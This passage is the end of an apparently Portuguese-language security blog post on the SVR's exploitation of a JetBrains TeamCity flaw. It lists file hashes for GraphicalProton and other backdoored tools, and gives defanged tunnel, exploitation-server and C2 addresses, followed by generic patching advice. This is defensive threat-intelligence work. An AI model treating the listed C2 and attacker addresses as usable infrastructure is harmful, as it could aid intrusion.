  • 620D2BF14FE345EEF618FDD1DAC242B3A0BB65CCB75699FE00F7C671F2C1D869
  • 773F0102720AF2957859D6930CD09693824D87DB705B3303CEF9EE794375CE13
  • 7B666B978DBBE7C032CEF19A90993E8E4922B743EE839632BFA6D99314EA6C53
  • 8AFB71B7CE511B0BCE642F46D6FC5DD79FAD86A58223061B684313966EFEF9C7
  • 971F0CED6C42DD2B6E3EA3E6C54D0081CF9B06E79A38C2EDE3A2C5228C27A6DC
  • CB83E5CB264161C28DE76A44D0EDB450745E773D24BEC5869D85F69633E44DCF
  • CD3584D61C2724F927553770924149BB51811742A461146B15B34A26C92CAD43
  • EBE231C90FAD02590FC56D5840ACC63B90312B0E2FEE7DA3C7606027ED92600E
  • F1B40E6E5A7CBC22F7A0BD34607B13E7E3493B8AAD7431C47F1366F0256E23EB
  • C7B01242D2E15C3DA0F45B8ADEC4E6913E534849CDE16A2A6C480045E03FBEE4
  • 4BF1915785D7C6E0987EB9C15857F7AC67DC365177A1707B14822131D43A6166

Porta traseira GraphicalProton HTTPS:

  • 18101518EAE3EEC6EBE453DE4C4C380160774D7C3ED5C79E1813013AC1BB0B93
  • 19F1EF66E449CF2A2B0283DBB756850CCA396114286E1485E35E6C672C9C3641
  • 1E74CF0223D57FD846E171F4A58790280D4593DF1F23132044076560A5455FF8
  • 219FB90D2E88A2197A9E08B0E7811E2E0BD23D59233287587CCC4642C2CF3D67
  • 92C7693E82A90D08249EDEAFBCA6533FED81B62E9E056DEC34C24756E0A130A6
  • B53E27C79EED8531B1E05827ACE2362603FB9F77F53CEE2E34940D570217CBF7
  • C37C109171F32456BBE57B8676CC533091E387E6BA733FBAA01175C43CFB6EBD
  • C40A8006A7B1F10B1B42FDD8D6D0F434BE503FB3400FB948AC9AB8DDFA5B78A0
  • C832462C15C8041191F190F7A88D25089D57F78E97161C3003D68D0CC2C4BAA3
  • F6194121E1540C3553273709127DFA1DAAB96B0ACFAB6E92548BFB4059913C69

vcperf backdoor:

  • D724728344FCF3812A0664A80270F7B4980B82342449A8C5A2FA510E10600443

Arquivo de instalação backdoor do Zabbix:

  • 4EE70128C70D646C5C2A9A17AD05949CB1FBF1043E9D671998812B2DCE75CF0F

Arquivo de instalação do Webroot AV backdoored:

  • 950ADBAF66AB214DE837E6F1C00921C501746616A882EA8C42F1BAD5F9B6EFF4

RSockstun modificado

  • CB83E5CB264161C28DE76A44D0EDB450745E773D24BEC5869D85F69633E44DCF

IoCs de rede

Pontos finais do túnel

  • 65.20.97[.]203
  • 65.21.51[.]58

Servidor de Exploração

  • 103.76.128[.]34

URL GraphicalProton HTTPS C2:

hxxps://matclick[.]com/wp-query[.]php

 

Conclusão

A exploração do SVR da vulnerabilidade do JetBrains TeamCity é um lembrete de que as organizações devem estar cientes das ameaças cibernéticas e tomar medidas para se protegerem. As organizações devem aplicar patches de segurança rapidamente e implementar outras medidas de segurança para ajudar a proteger seus sistemas.

Descubra mais sobre DCiber

Assine para receber os posts mais recentes por e-mail.

ARTIGOS RELACIONADOSMais do autor